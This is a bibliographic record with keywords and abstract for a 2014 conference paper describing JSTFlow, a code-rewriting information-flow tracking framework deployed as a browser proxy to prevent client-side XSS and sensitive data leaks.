Visible to the public Preventing Client Side XSS with Rewrite Based Dynamic Information Flow

TitlePreventing Client Side XSS with Rewrite Based Dynamic Information Flow
Publication TypeConference Paper
Year of Publication2014
AuthorsWenmin Xiao, Jianhua Sun, Hao Chen, Xianghua Xu
Conference NameParallel Architectures, Algorithms and Programming (PAAP), 2014 Sixth International Symposium on
Date PublishedJuly
Keywordsabstract intermediate representation, Abstracts, browser proxy, Browsers, client side XSS, code rewrite, cross-site scripting, data flow analysis, Data models, Engines, fine-grained isolation, information flow analysis, information flow tracking framework, Information security, Internet, Java, JavaScript, JavaScript abstract syntax tree, JavaScript code, JSTFlow, online front-ends, performance overhead, rewrite based dynamic information flow, security, security of data, Semantics, sensitive information leaks, Syntactics, taint engine, taint model, tainted information flow, Web applications, XSS Attacks

This paper presents the design and implementation of an information flow tracking framework based on code rewrite to prevent sensitive information leaks in browsers, combining the ideas of taint and information flow analysis. Our system has two main processes. First, it abstracts the semantic of JavaScript code and converts it to a general form of intermediate representation on the basis of JavaScript abstract syntax tree. Second, the abstract intermediate representation is implemented as a special taint engine to analyze tainted information flow. Our approach can ensure fine-grained isolation for both confidentiality and integrity of information. We have implemented a proof-of-concept prototype, named JSTFlow, and have deployed it as a browser proxy to rewrite web applications at runtime. The experiment results show that JSTFlow can guarantee the security of sensitive data and detect XSS attacks with about 3x performance overhead. Because it does not involve any modifications to the target system, our system is readily deployable in practice.

Citation Key6916471